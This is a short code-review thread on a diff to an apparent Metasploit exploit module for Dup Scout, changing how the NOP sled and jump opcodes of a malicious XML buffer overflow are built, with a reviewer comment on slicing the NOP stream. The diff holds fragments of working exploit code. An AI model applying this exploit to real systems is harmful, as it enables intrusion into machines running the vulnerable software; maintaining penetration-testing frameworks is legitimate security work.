modules/exploits/windows/fileformat/dupscout_xml.rb

```diff
@@ -51,18 +51,20 @@ def initialize(info = {})
   end
 
   def exploit
+    nops = make_nops(1000)*5
+
     esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76]
-    jmp = "\xFF\xE0" # JMP ESP
+    jmp = "\xFF\xE0" # JMP EAX
 
     buffer =  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'"
-    buffer << "\x90" * 1560
+    buffer << nops[0,1560]
```

Comment:
I would just call `make_nops` for the size we need in all these cases since slicing into the nop stream is not guaranteed to be safe.

Reply:
Lol, we discussed this on Slack yesterday.